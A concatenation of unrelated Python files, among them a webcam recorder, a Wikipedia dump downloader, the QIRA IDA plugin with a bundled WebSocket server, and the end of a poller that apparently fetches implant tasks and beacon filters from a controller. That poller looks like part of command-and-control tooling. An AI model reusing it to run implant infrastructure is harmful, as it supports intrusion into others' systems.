:type task_queue: dict
:param task_queue: Dictionary of Implant tasks {uuid -> tasks}
"""
self.interval = interval
self.beacon_filters = beacon_filters
self.task_queue = task_queue
self.running = True
self.logger = logger
def check_beacon_filters(self):
"""Get Beacon Filters from the controller and update the local list"""
self.logger("Checking for new Beacon filters")
try:
new_beacon_filters = api.get_beacon_filters()['result']
self.beacon_filters.beacon_update(new_beacon_filters)
except (TypeError, KeyError):
self.logger("No Beacon Filters received")
def check_tasks(self):
"""Get Tasks from the controller and update the queue"""
self.logger("Checking for new Tasks")
implants = api.get_implants()
try:
implants = implants['result']
for implant in implants:
uuid = int(implant['uuid'])
tasks = implant['all_tasks']
for task in tasks:
#print("uuid: %s => %s" % (uuid, json.loads(task)))
self.task_queue.add_task(uuid, json.loads(task))
except (TypeError, KeyError):
self.logger("No Tasks received")
self.logger("Implant info received: %s" % implants)
def loop(self):
"""Run forever"""
while self.running:
self.check_tasks()
self.check_beacon_filters()
time.sleep(self.interval)
def stop(self):
self.running = False
self.thread.join()
def start(self):
self.running = True
self.thread = threading.Thread(target=self.loop, args=())
self.thread.daemon = True
self.thread.start()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(prog='Lp')
parser.add_argument("-v", "--verbose", help="increase output verbosity",
action="store_true", default=False)
parser.add_argument("-d", "--daemon", help="run in background (daemonize)",
choices=['start', 'stop', 'restart'],
default=False)
args = parser.parse_args()
dp = DataPoller()
dp.verbose = args.verbose
if args.daemon == 'start':
print("start")
dp.start()
elif args.daemon == 'stop':
print("stop")
dp.stop()
elif args.daemon == 'restart':
print("restart")
dp.restart()
else:
print("loop")
dp.loop()
|
randomi.py
|
# Meet randomI Mk II, a random data generator for test data generation
# For random generation of numbers import randint
from random import randint
# Importing the time for benchmarking purposes
import time
from datetime import date
# Importing for multi core processing
import multiprocessing
# randomI function which creates each file
def randomI(units, rows, rowLength, partstart):
for setcounter in range(0, units):
writeFile(generateFile(rows, rowLength), setcounter, partstart)
# Function for generating the content of one single file
def generateFile(rows, rowLength):
content = []
for y in range(0, rows):
content.append(generateRow(rowLength))
return content
# Function for generating the content of one single row randomly
def generateRow(rowLength):
row = ""
for z in range(0, rowLength):
row = row + str(randint(0, 9))
return row
# Function for writing data into a file
def writeFile(content, setcounter, partstart):
filenumber = int(setcounter) + int(partstart)
file = open("testdata/file" + str(filenumber) + ".txt", "w")
for w in range(0, len(content)):
file.write(content[w] + "\n")
if __name__ == '__main__':
# Getting the user input
print("Hello World")
units = int(input("How many units would you like to generate? "))
rows = int(input("How many rows should each unit have? "))
rowLength = int(input("How long should each row be? "))
cores = int(input("How many cores do you want to use? "))
# Splitting up the units
count = int(0)
partsize = units / cores
# For benchmarking starting the timer now
start_time = time.time()
# Initialize and prepare cores for process
while count < cores:
partstart = partsize * count
globals()["p" + str(count)] = multiprocessing.Process(target=randomI, args=(int(partsize), rows, rowLength, partstart))
count = count + 1
# Starting each core
count = int(0)
while count < cores:
globals()["p" + str(count)].start()
print("Core " + str(count) + " started.")
count = count + 1
print("Working...")
# Joining each core for the process
count = int(0)
while count < cores:
globals()["p" + str(count)].join()
count = count + 1
# Finishing up the process
sec = time.time() - start_time
print("Data is generated. Have fun!")
print("randomI took " + str(sec) + " seconds for execution.")
|
wiki_dump_download.py
|
import argparse
import glob
import hashlib
import json
import logging
import os
import threading
import urllib.request
from datetime import datetime
parser = argparse.ArgumentParser(description='WikiDump Downloader')
parser.add_argument('--data-path', type=str, default="./data/", help='the data directory')
parser.add_argument('--compress-type', type=str, default='bz2',
help='the compressed file type to download: 7z or bz2 [default: bz2]')
parser.add_argument('--threads', type=int, default=3, help='number of threads [default: 3]')
parser.add_argument('--start', type=int, default=1, help='the first file to download [default: 0]')
parser.add_argument('--end', type=int, default=-1, help='the last file to download [default: -1]')
parser.add_argument('--verify', action='store_true', default=False, help='verify the dump files in the specific path')
args = parser.parse_args()
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)s) %(message)s',
)
def download(dump_status_file, data_path, compress_type, start, end, thread_num):
url_list = []
file_list = []
with open(dump_status_file) as json_data:
# Two dump types: compressed by 7z (metahistory7zdump) or bz2 (metahistorybz2dump)
history_dump = json.load(json_data)['jobs']['metahistory' + compress_type + 'dump']
dump_dict = history_dump['files']
dump_files = sorted(list(dump_dict.keys()))
if args.end > 0 and args.end <= len(dump_files):
dump_files = dump_files[start - 1:end]
else:
dump_files = dump_files[start - 1:]
# print all files to be downloaded.
print("All files to download ...")
for i, file in enumerate(dump_files):
print(i + args.start, file)
file_num = 0
for dump_file in dump_files:
file_name = data_path + dump_file
file_list.append(file_name)
# url example: https://dumps.wikimedia.org/enwiki/20180501/enwiki-20180501-pages-meta-history1.xml-p10p2123.7z
url = "https://dumps.wikimedia.org" + dump_dict[dump_file]['url']
url_list.append(url)
file_num += 1
print('Total file ', file_num, ' to be downloaded ...')
json_data.close()
task = WikiDumpTask(file_list, url_list)
threads = []
for i in range(thread_num):
t = threading.Thread(target=worker, args=(i, task))
threads.append(t)
t.start()
logging.debug('Waiting for worker threads')
main_thread = threading.currentThread()
for t in threading.enumerate():
if t is not main_thread:
t.join()
def existFile(data_path, cur_file):
exist_file_list = glob.glob(data_path + "*." + args.compress_type)
exist_file_names = [os.path.basename(i) for i in exist_file_list]
cur_file_name = os.path.basename(cur_file)
if cur_file_name in exist_file_names:
return True
return False
def md5(file):
hash_md5 = hashlib.md5()
with open(file, "rb") as f:
for chunk in iter(lambda: f.read(40960000), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def verify(dump_status_file, compress_type, data_path):
print("Verify the file in folder:", data_path)
pass_files, miss_files, crash_files = [], [], []
with open(dump_status_file) as json_data:
# Two dump types: compressed by 7z (metahistory7zdump) or bz2 (metahistorybz2dump)
history_dump = json.load(json_data)['jobs']['metahistory' + compress_type + 'dump']
dump_dict = history_dump['files']
for i, (file, value) in enumerate(dump_dict.items()):
gt_md5 = value['md5']
print("#", i, " ", file, ' ', value['md5'], sep='')
if existFile(data_path, file):
file_md5 = md5(data_path + file)
if file_md5 == gt_md5:
pass_files.append(file)
else:
crash_files.append(file)
else:
miss_files.append(file)
print(len(pass_files), "files passed, ", len(miss_files), "files missed, ", len(crash_files), "files crashed.")
if len(miss_files):
print("==== Missed Files ====")
print(miss_files)
if len(crash_files):
print("==== Crashed Files ====")
print(crash_files)
def main():
dump_status_file = args.data_path + "dumpstatus.json"
if args.verify:
verify(dump_status_file, args.compress_type, args.data_path)
else:
download(dump_status_file, args.data_path, args.compress_type, args.start, args.end, args.threads)
'''
WikiDumpTask class contains a list of dump files to be downloaded .
The assign_task function will be called by workers to grab a task.
'''
class WikiDumpTask(object):
def __init__(self, file_list, url_list):
self.lock = threading.Lock()
self.url_list = url_list
self.file_list = file_list
self.total_num = len(url_list)
def assign_task(self):
logging.debug('Assign tasks ... Waiting for lock')
self.lock.acquire()
url = None
file_name = None
cur_progress = None
try:
# logging.debug('Acquired lock')
if len(self.url_list) > 0:
url = self.url_list.pop(0)
file_name = self.file_list.pop(0)
cur_progress = self.total_num - len(self.url_list)
finally:
self.lock.release()
return url, file_name, cur_progress, self.total_num
'''
worker is main function for each thread.
'''
def worker(work_id, tasks):
logging.debug('Starting.')
# grab one task from task_list
while 1:
url, file_name, cur_progress, total_num = tasks.assign_task()
if not url:
break
logging.debug('Assigned task (' + str(cur_progress) + '/' + str(total_num) + '): ' + str(url))
if not existFile(args.data_path, file_name):
urllib.request.urlretrieve(url, file_name)
logging.debug("File Downloaded: " + url)
else:
logging.debug("File Exists, Skip: " + url)
logging.debug('Exiting.')
return
if __name__ == '__main__':
start_time = datetime.now()
main()
time_elapsed = datetime.now() - start_time
print('Time elapsed (hh:mm:ss.ms) {}'.format(time_elapsed))
|
qira.py
|
import idaapi
import threading
import time
wsserver = None
qira_address = None
# this handles all receiving
msg_queue = [] # python array is threadsafe
def handle_message_queue():
global msg_queue
while len(msg_queue) > 0:
dat = msg_queue[0].split(" ")
msg_queue = msg_queue[1:]
if dat[0] == "setaddress" and dat[1] != "undefined":
try:
a = idaapi.toEA(0, int(str(dat[1][2:]),16))
jump_to(a)
except e:
idaapi.msg("[QIRA Plugin] Error processing the address\n")
def start_server():
global wsserver
wsserver = SimpleWebSocketServer('', 3003, QiraServer)
if wsserver is not None:
idaapi.msg("[QIRA Plugin] Starting WS Server\n")
wsserver.serveforever()
def set_qira_address(la):
global qira_address
ea = 0
if qira_address is not None and qira_address != BADADDR:
ea = idaapi.toEA(0, qira_address)
idaapi.del_bpt(ea)
qira_address = la
idaapi.add_bpt(qira_address, 0, BPT_SOFT)
EnableBpt(qira_address, False)
def jump_to(a):
global qira_address
if a is not None:
if (a != qira_address) and (a != BADADDR):
set_qira_address(a)
idaapi.jumpto(qira_address, -1, 0)
else:
idaapi.jumpto(qira_address, -1, 0)
def ws_send(msg):
global wsserver
if (wsserver is not None) and (msg is not None):
for conn in wsserver.connections.itervalues():
conn.sendMessage(msg)
def update_address(addr_type, addr):
if (addr_type is not None) and (addr is not None):
cmd = "set%s 0x%x" % (addr_type, addr)
ws_send(cmd)
def update_comment(addr, rpt):
cmt = idaapi.get_cmt(addr, rpt)
if cmt is not None:
ws_send("setcmt 0x%x %s" % (addr, cmt))
class MyIDAViewWrapper(idaapi.IDAViewWrapper):
def __init__(self, viewName):
idaapi.IDAViewWrapper.__init__(self, viewName)
self.old_addr = None
self.addr = None
def OnViewCurpos(self):
self.addr = idaapi.get_screen_ea()
if (self.old_addr != self.addr):
if (idaapi.isCode(idaapi.getFlags(self.addr))):
# don't update the address if it's already the qira address or None
if (self.addr is not None) and (self.addr != qira_address):
#idaapi.msg("[QIRA Plugin] Qira Address %x \n" % (self.addr))
# Instruction Address
set_qira_address(self.addr)
update_address("iaddr", self.addr)
else:
# Data Address
update_address("daddr", self.addr)
self.old_addr = self.addr
class idbhook(idaapi.IDB_Hooks):
def cmt_changed(self, a, b):
update_comment(a, b)
return 0
class idphook(idaapi.IDP_Hooks):
def renamed(self, ea, new_name, local_name):
#print ea, new_name
ws_send("setname 0x%x %s" % (ea, new_name))
return 0
class uihook(idaapi.UI_Hooks):
def __init__(self):
idaapi.UI_Hooks.__init__(self)
self.binds = []
def preprocess(self, arg):
#print "preprocess", arg
return 0
def current_tform_changed(self, a1, a2):
#print "tform", idaapi.get_tform_title(a1)
tm = MyIDAViewWrapper(idaapi.get_tform_title(a1))
if tm.Bind():
self.binds.append(tm)
return 0
class qiraplugin_t(idaapi.plugin_t):
flags = 0
comment = "QEMU Interactive Runtime Analyser plugin"
help = "Visit qira.me for more infos"
wanted_name = "QIRA Plugin"
wanted_hotkey = "z"
def init(self):
threading.Thread(target=start_server).start()
idaapi.msg("[QIRA Plugin] Ready to go!\n")
self.w1 = None
#threading.Thread(target=poll_address).start()
self.idbhook = idbhook()
self.idbhook.hook()
self.idphook = idphook()
self.idphook.hook()
self.uihook = uihook()
self.uihook.hook()
return idaapi.PLUGIN_KEEP
def run(self, arg):
global qira_address
idaapi.msg("[QIRA Plugin] Syncing with Qira\n")
# sync names
for i in range(idaapi.get_nlist_size()):
ws_send("setname 0x%x %s" % (idaapi.get_nlist_ea(i), idaapi.get_nlist_name(i)))
# sync comment
addr = idaapi.get_segm_base(idaapi.get_first_seg())
while addr != idaapi.BADADDR:
for rpt in [True, False]:
update_comment(addr, rpt)
addr = idaapi.nextaddr(addr)
def term(self):
global wsserver
if wsserver is not None:
wsserver.close()
idaapi.msg("[QIRA Plugin] Plugin uninstalled!\n")
def PLUGIN_ENTRY():
return qiraplugin_t()
###########################################################
# #
# SimpleWebSocketServer #
# https://github.com/opiate/SimpleWebSocketServer.git #
# #
###########################################################
'''
The MIT License (MIT)
Copyright (c) 2013 Dave P.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
import SocketServer
import hashlib
import base64
import socket
import struct
import ssl
import time
import sys
import errno
import logging
from BaseHTTPServer import BaseHTTPRequestHandler
from StringIO import StringIO
from select import select
class HTTPRequest(BaseHTTPRequestHandler):
def __init__(self, request_text):
self.rfile = StringIO(request_text)
self.raw_requestline = self.rfile.readline()
self.error_code = self.error_message = None
self.parse_request()
class WebSocket(object):
handshakeStr = (
"HTTP/1.1 101 Switching Protocols\r\n"
"Upgrade: WebSocket\r\n"
"Connection: Upgrade\r\n"
"Sec-WebSocket-Protocol: qira\r\n"
"Sec-WebSocket-Accept: %(acceptstr)s\r\n\r\n"
)
hixiehandshakedStr = (
"HTTP/1.1 101 WebSocket Protocol Handshake\r\n"
"Upgrade: WebSocket\r\n"
"Connection: Upgrade\r\n"
"Sec-WebSocket-Origin: %(origin)s\r\n"
"Sec-WebSocket-Protocol: qira\r\n"
"Sec-WebSocket-Location: %(type)s://%(host)s%(location)s\r\n\r\n"
)
GUIDStr = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11'
STREAM = 0x0
TEXT = 0x1
BINARY = 0x2
CLOSE = 0x8
PING = 0x9
PONG = 0xA
HEADERB1 = 1
HEADERB2 = 3
LENGTHSHORT = 4
LENGTHLONG = 5
MASK = 6
PAYLOAD = 7
def __init__(self, server, sock, address):
self.server = server
self.client = sock
self.address = address
self.handshaked = False
self.headerbuffer = ''
self.readdraftkey = False
self.draftkey = ''
self.headertoread = 2048
self.hixie76 = False
self.fin = 0
self.data = None
self.opcode = 0
self.hasmask = 0
self.maskarray = None
self.length = 0
self.lengtharray = None
self.index = 0
self.request = None
self.usingssl = False
self.state = self.HEADERB1
# restrict the size of header and payload for security reasons
self.maxheader = 65536
self.maxpayload = 4194304
def close(self):
self.client.close()
self.state = self.HEADERB1
self.hasmask = False
self.handshaked = False
self.readdraftkey = False
self.hixie76 = False
self.headertoread = 2048
self.headerbuffer = ''
self.data = ''
def handleMessage(self):
pass
def handleConnected(self):
pass
def handleClose(self):
pass
def handlePacket(self):
# close
if self.opcode == self.CLOSE:
self.sendClose()
raise Exception("received client close")
# ping
elif self.opcode == self.PING:
pass
# pong
elif self.opcode == self.PONG:
pass
# data
elif self.opcode == self.STREAM or self.opcode == self.TEXT or self.opcode == self.BINARY:
self.handleMessage()
def handleData(self):
# do the HTTP header and handshake
if self.handshaked is False:
data = self.client.recv(self.headertoread)
if data:
# accumulate
self.headerbuffer += data
if len(self.headerbuffer) >= self.maxheader:
raise Exception('header exceeded allowable size')
# we need to read the entire 8 bytes of after the HTTP header, ensure we do
if self.readdraftkey is True:
self.draftkey += self.headerbuffer
read = self.headertoread - len(self.headerbuffer)
if read != 0:
self.headertoread = read
else:
# complete hixie76 handshake
self.handshake_hixie76()
# indicates end of HTTP header
elif '\r\n\r\n' in self.headerbuffer:
self.request = HTTPRequest(self.headerbuffer)
# hixie handshake
if self.request.headers.has_key('Sec-WebSocket-Key1'.lower()) and self.request.headers.has_key('Sec-WebSocket-Key2'.lower()):
# check if we have the key in our buffer
index = self.headerbuffer.find('\r\n\r\n') + 4
# determine how much of the 8 byte key we have
read = len(self.headerbuffer) - index
# do we have all the 8 bytes we need?
if read < 8:
self.headertoread = 8 - read
self.readdraftkey = True
if read > 0:
self.draftkey += self.headerbuffer[index:index+read]
else:
# get the key
self.draftkey += self.headerbuffer[index:index+8]
# complete hixie handshake
self.handshake_hixie76()
# handshake rfc 6455
elif self.request.headers.has_key('Sec-WebSocket-Key'.lower()):
key = self.request.headers['Sec-WebSocket-Key'.lower()]
hStr = self.handshakeStr % { 'acceptstr' : base64.b64encode(hashlib.sha1(key + self.GUIDStr).digest()) }
self.sendBuffer(hStr)
self.handshaked = True
self.headerbuffer = ''
try:
self.handleConnected()
except:
pass
else:
raise Exception('Sec-WebSocket-Key does not exist')
# remote connection has been closed
else:
raise Exception("remote socket closed")
# else do normal data
else:
data = self.client.recv(2048)
if data:
for val in data:
if self.hixie76 is False:
self.parseMessage(ord(val))
else:
self.parseMessage_hixie76(ord(val))
else:
raise Exception("remote socket closed")
def handshake_hixie76(self):
k1 = self.request.headers['Sec-WebSocket-Key1'.lower()]
k2 = self.request.headers['Sec-WebSocket-Key2'.lower()]
spaces1 = k1.count(" ")
spaces2 = k2.count(" ")
num1 = int("".join([c for c in k1 if c.isdigit()])) / spaces1
num2 = int("".join([c for c in k2 if c.isdigit()])) / spaces2
key = ''
key += struct.pack('>I', num1)
key += struct.pack('>I', num2)
key += self.draftkey
typestr = 'ws'
if self.usingssl is True:
typestr = 'wss'
response = self.hixiehandshakedStr % { 'type' : typestr, 'origin' : self.request.headers['Origin'.lower()], 'host' : self.request.headers['Host'.lower()], 'location' : self.request.path }
self.sendBuffer(response)
self.sendBuffer(hashlib.md5(key).digest())
self.handshaked = True
self.hixie76 = True
self.headerbuffer = ''
try:
self.handleConnected()
except:
pass
def sendClose(self):
msg = bytearray()
if self.hixie76 is False:
msg.append(0x88)
msg.append(0x00)
self.sendBuffer(msg)
else:
pass
def sendBuffer(self, buff):
size = len(buff)
tosend = size
index = 0
while tosend > 0:
try:
# i should be able to send a bytearray
sent = self.client.send(str(buff[index:size]))
if sent == 0:
raise RuntimeError("socket connection broken")
index += sent
tosend -= sent
except socket.error as e:
# if we have full buffers then wait for them to drain and try again
if e.errno == errno.EAGAIN:
time.sleep(0.001)
else:
raise e
#if s is a string then websocket TEXT is sent else BINARY
def sendMessage(self, s):
if self.hixie76 is False:
header = bytearray()
isString = isinstance(s, str)
if isString is True:
header.append(0x81)
else:
header.append(0x82)
b2 = 0
length = len(s)
if length <= 125:
b2 |= length
header.append(b2)
elif length >= 126 and length <= 65535:
b2 |= 126
header.append(b2)
header.extend(struct.pack("!H", length))
else:
b2 |= 127
header.append(b2)
header.extend(struct.pack("!Q", length))
if length > 0:
self.sendBuffer(header + s)
else:
self.sendBuffer(header)
header = None
else:
msg = bytearray()
msg.append(0)
if len(s) > 0:
msg.extend(str(s).encode("UTF8"))
msg.append(0xFF)
self.sendBuffer(msg)
msg = None
def parseMessage_hixie76(self, byte):
if self.state == self.HEADERB1:
if byte == 0:
self.state = self.PAYLOAD
self.data = bytearray()
elif self.state == self.PAYLOAD:
if byte == 0xFF:
self.opcode = 1
self.length = len(self.data)
try:
self.handlePacket()
finally:
self.data = None
self.state = self.HEADERB1
else :
self.data.append(byte)
# if length exceeds allowable size then we except and remove the connection
if len(self.data) >= self.maxpayload:
raise Exception('payload exceeded allowable size')
def parseMessage(self, byte):
# read in the header
if self.state == self.HEADERB1:
# fin
self.fin = (byte & 0x80)
# get opcode
self.opcode = (byte & 0x0F)
self.state = self.HEADERB2
elif self.state == self.HEADERB2:
mask = byte & 0x80
length = byte & 0x7F
if mask == 128:
self.hasmask = True
else:
self.hasmask = False
if length <= 125:
self.length = length
# if we have a mask we must read it
if self.hasmask is True:
self.maskarray = bytearray()
self.state = self.MASK
else:
# if there is no mask and no payload we are done
if self.length <= 0:
try:
self.handlePacket()
finally:
self.state = self.HEADERB1
self.data = None
# we have no mask and some payload
else:
self.index = 0
self.data = bytearray()
self.state = self.PAYLOAD
elif length == 126:
self.lengtharray = bytearray()
self.state = self.LENGTHSHORT
elif length == 127:
self.lengtharray = bytearray()
self.state = self.LENGTHLONG
elif self.state == self.LENGTHSHORT:
self.lengtharray.append(byte)
if len(self.lengtharray) > 2:
raise Exception('short length exceeded allowable size')
if len(self.lengtharray) == 2:
self.length = struct.unpack_from('!H', str(self.lengtharray))[0]
if self.hasmask is True:
self.maskarray = bytearray()
self.state = self.MASK
else:
# if there is no mask and no payload we are done
if self.length <= 0:
try:
self.handlePacket()
finally:
self.state = self.HEADERB1
self.data = None
# we have no mask and some payload
else:
self.index = 0
self.data = bytearray()
self.state = self.PAYLOAD
elif self.state == self.LENGTHLONG:
self.lengtharray.append(byte)
if len(self.lengtharray) > 8:
raise Exception('long length exceeded allowable size')
if len(self.lengtharray) == 8:
self.length = struct.unpack_from('!Q', str(self.lengtharray))[0]
if self.hasmask is True:
self.maskarray = bytearray()
self.state = self.MASK
else:
# if there is no mask and no payload we are done
if self.length <= 0:
try:
self.handlePacket()
finally:
self.state = self.HEADERB1
self.data = None
# we have no mask and some payload
else:
self.index = 0
self.data = bytearray()
self.state = self.PAYLOAD
# MASK STATE
elif self.state == self.MASK:
self.maskarray.append(byte)
if len(self.maskarray) > 4:
raise Exception('mask exceeded allowable size')
if len(self.maskarray) == 4:
# if there is no mask and no payload we are done
if self.length <= 0:
try:
self.handlePacket()
finally:
self.state = self.HEADERB1
self.data = None
# we have no mask and some payload
else:
self.index = 0
self.data = bytearray()
self.state = self.PAYLOAD
# PAYLOAD STATE
elif self.state == self.PAYLOAD:
if self.hasmask is True:
self.data.append( byte ^ self.maskarray[self.index % 4] )
else:
self.data.append( byte )
# if length exceeds allowable size then we except and remove the connection
if len(self.data) >= self.maxpayload:
raise Exception('payload exceeded allowable size')
# check if we have processed length bytes; if so we are done
if (self.index+1) == self.length:
try:
self.handlePacket()
finally:
self.state = self.HEADERB1
self.data = None
else:
self.index += 1
class SimpleWebSocketServer(object):
def __init__(self, host, port, websocketclass):
self.websocketclass = websocketclass
self.serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.serversocket.bind((host, port))
self.serversocket.listen(5)
self.connections = {}
self.listeners = [self.serversocket]
self.forceclose = False
def decorateSocket(self, sock):
return sock
def constructWebSocket(self, sock, address):
return self.websocketclass(self, sock, address)
def close(self):
self.serversocket.close()
for conn in self.connections.itervalues():
try:
conn.handleClose()
except:
pass
conn.close()
self.forceclose = True
def serveforever(self):
while True:
rList, wList, xList = select(self.listeners, [], self.listeners, 1)
if self.forceclose:
break
for ready in rList:
if ready == self.serversocket:
try:
sock, address = self.serversocket.accept()
newsock = self.decorateSocket(sock)
newsock.setblocking(0)
fileno = newsock.fileno()
self.listeners.append(fileno)
self.connections[fileno] = self.constructWebSocket(newsock, address)
except Exception as n:
logging.debug(str(address) + ' ' + str(n))
if sock is not None:
sock.close()
else:
client = self.connections[ready]
try:
client.handleData()
except Exception as n:
logging.debug(str(client.address) + ' ' + str(n))
try:
client.handleClose()
except:
pass
client.close()
del self.connections[ready]
self.listeners.remove(ready)
for failed in xList:
if failed == self.serversocket:
self.close()
raise Exception("server socket failed")
else:
client = self.connections[failed]
try:
client.handleClose()
except:
pass
client.close()
del self.connections[failed]
self.listeners.remove(failed)
class SimpleSSLWebSocketServer(SimpleWebSocketServer):
def __init__(self, host, port, websocketclass, certfile, keyfile, version = ssl.PROTOCOL_TLSv1):
SimpleWebSocketServer.__init__(self, host, port, websocketclass)
self.cerfile = certfile
self.keyfile = keyfile
self.version = version
def close(self):
super(SimpleSSLWebSocketServer, self).close()
def decorateSocket(self, sock):
sslsock = ssl.wrap_socket(sock,
server_side=True,
certfile=self.cerfile,
keyfile=self.keyfile,
ssl_version=self.version)
return sslsock
def constructWebSocket(self, sock, address):
ws = self.websocketclass(self, sock, address)
ws.usingssl = True
return ws
def serveforever(self):
super(SimpleSSLWebSocketServer, self).serveforever()
###################
# #
# QIRA CODE #
# #
###################
class QiraServer(WebSocket):
def handleMessage(self):
msg_queue.append(self.data)
idaapi.execute_sync(handle_message_queue, idaapi.MFF_WRITE)
def handleConnected(self):
idaapi.msg("[QIRA Plugin] Client connected\n")
def handleClose(self):
idaapi.msg("[QIRA Plugin] WebSocket closed\n")
|
problem_with_builtin_queue.py
|
from queue import Queue
from threading import Lock, Thread, currentThread
from time import sleep
# one way to break the built in Queue join function :is to make the put method sleep for while that way the unfinished_tasks will be 0
# and when task_done get called it will notify the join
q = Queue()
def producer():
for i in range(10):
q.put(i)
print(f"producer {i}")
sleep(1)
q.put(None)
def consumer():
while True:
item = q.get()
if item == None:
q.task_done()
break
q.task_done()
print(f"consumer {item}")
t1 = Thread(target=producer)
t2 = Thread(target=consumer)
t1.start()
t2.start()
q.join()
print(12)
|
start.py
|
import cv2
import time
from pathlib import Path
from datetime import datetime
from threading import Thread
import queue
from typing import Union
def dt_name(dt: datetime) -> str:
"""Convert datetime object to path string."""
return dt.strftime('%Y%m%d-%H%M%S-%f')
def create_path(root: Path, subfolder: Union[str, Path]) -> Path:
"""Set up path and ensure it exists."""
newpath = root
if not newpath.is_dir():
raise ValueError('Root path does not exist: {}'.format(str(root)))
newpath = newpath.joinpath(subfolder)
if not newpath.is_dir():
newpath.mkdir()
return newpath
class CVReader():
"""OpenCV webcam reader."""
def __init__(self, image_queue: queue.Queue()):
"""Init."""
self.image_queue = image_queue
self._running = False
def terminate(self):
"""Terminate thread."""
self.stop()
def stop(self):
"""Stop webcam capturing."""
self._running = False
def run(self):
"""Start webcam capturing."""
cam = cv2.VideoCapture(0)
self._running = True
while self._running:
# Read frame
ret, frame = cam.read()
if not ret:
print('ERROR: Failed to grab frame.')
time.sleep(0.01)
continue
self.image_queue.put((frame, datetime.now()))
cam.release()
def record_images(root_folder: Union[str, Path]):
"""Use opencv to record timestamped images from the webcam."""
# Setup paths
if not root_folder:
root_folder = Path.cwd()
root_folder = create_path(root_folder, 'data')
current_subfolder = create_path(root_folder, dt_name(datetime.now()))
print('Starting in new folder:', current_subfolder)
# Setup Window
cv2.namedWindow(__file__)
# Setup queue and thread
image_queue = queue.Queue()
cvreader = CVReader(image_queue=image_queue)
cvreader_thread = Thread(target = cvreader.run)
cvreader_thread.start()
while True:
# Get frame
frame = None
while not image_queue.empty():
try:
(frame, dt) = image_queue.get(block=True, timeout=1)
except queue.Empty:
frame = None
continue
if frame is not None:
# Store frame
img_name = current_subfolder.joinpath('frame_{}.png'.format(dt_name(dt)))
cv2.imwrite(str(img_name), frame)
# Only the last frame in a queue is shown (else the queue will grow)
if frame is not None:
# Show frame
cv2.imshow(__file__, frame)
# User interfaction
key = cv2.waitKey(33)
if key == -1:
# No key pressed
continue
elif key in (27, ord('q')):
# Quit (ESC, q)
cvreader.terminate()
print('Quit with:', key)
break
elif key in (13, 32):
# Start in new folder (ENTER, SPACE)
current_subfolder = create_path(root_folder, dt_name(datetime.now()))
print('Starting in new folder:', current_subfolder)
cv2.destroyAllWindows()
cvreader_thread.join()
if __name__ == '__main__':
root_folder = Path.cwd()
record_images(root_folder)
|
views.py
|
import json
from multiprocessing.dummy import Process
import os
import uuid
from flask import Markup, render_template, request, redirect, send_from_directory, url_for, Blueprint, current_app
from werkzeug.utils import secure_filename
import numpy as np
import uncurl
from .cache import cache
from .generate_analysis import generate_uncurl_analysis, get_progress
from .data_stats import Summary
views = Blueprint('views', __name__, template_folder='templates')
# TODO: allow this to upload multiple files with multiple genes
def load_upload_data(request_files, request_form, path=None):
# TODO: should we merge the datasets here... or merge them in a downstream step?
data_paths = []
gene_paths = []
shapes = []
output_filenames = []
data_names = []
for key, f in request_files.items():
if 'fileinput' in key:
input_id = key.split('-')[1]
output_filename = secure_filename(f.filename)
if output_filename == '':
return
output_filenames.append(output_filename)
# allow for mtx input data
input_type = request_form['inputtype-{0}'.format(input_id)]
if output_filename.endswith('.mtx.gz') or output_filename.endswith('.mtx'):
input_type = 'sparse'
if input_type == 'dense':
data_filename = 'data_{0}.txt'.format(input_id)
if output_filename.endswith('.gz'):
data_filename = 'data_{0}.txt.gz'.format(input_id)
data_path = os.path.join(path, data_filename)
f.save(data_path)
elif input_type == 'sparse':
data_filename = 'data_{0}.mtx'.format(input_id)
if output_filename.endswith('.mtx.gz'):
data_filename = 'data_{0}.mtx.gz'.format(input_id)
data_path = os.path.join(path, data_filename)
f.save(data_path)
shape = request_form['data_shape-{0}'.format(input_id)]
shapes.append(shape)
# TODO: try to find gene names
data_paths.append(data_path)
try:
gene_file = request_files['genenames-{0}'.format(input_id)]
print(gene_file)
gene_output_file = load_gene_names(gene_file, path, input_id)
gene_paths.append(gene_output_file)
except:
gene_paths.append(None)
data_name = request_form['data_name-{0}'.format(input_id)]
if len(data_name) == 0:
data_name = str(input_id)
data_names.append(data_name)
init = None
return data_paths, gene_paths, data_names, init, shapes
def load_gene_names(f, path=None, index=1):
gene_filename = secure_filename(f.filename)
gene_output_path = os.path.join(path, 'gene_names_{0}.txt'.format(index))
if gene_filename.endswith('genes.csv'):
import pandas as pd
data = pd.read_csv(f)
try:
gene_names = data['gene_name']
gene_names.to_csv(gene_output_path, header=None, index=None)
except Exception as e:
print(e)
f.seek(0)
f.save(gene_output_path)
elif gene_filename.endswith('features.tsv'):
import pandas as pd
data = pd.read_csv(f, sep='\t', header=None)
try:
gene_names = data[1]
gene_names.to_csv(gene_output_path, header=None, index=None)
except Exception as e:
print(e)
f.seek(0)
f.save(gene_output_path)
else:
f.save(gene_output_path)
return gene_output_path
@views.route('/help')
def help():
return render_template('help.html')
@views.route('/state_estimation')
@cache.cached()
def state_estimation():
return render_template('state_estimation.html')
@views.route('/state_estimation/input', methods=['POST'])
def state_estimation_input():
user_id = str(uuid.uuid4())
if 'username' in request.form:
if len(request.form['username']) > 0:
# make username a safe string
keep_chars = set(['-', '_', ' '])
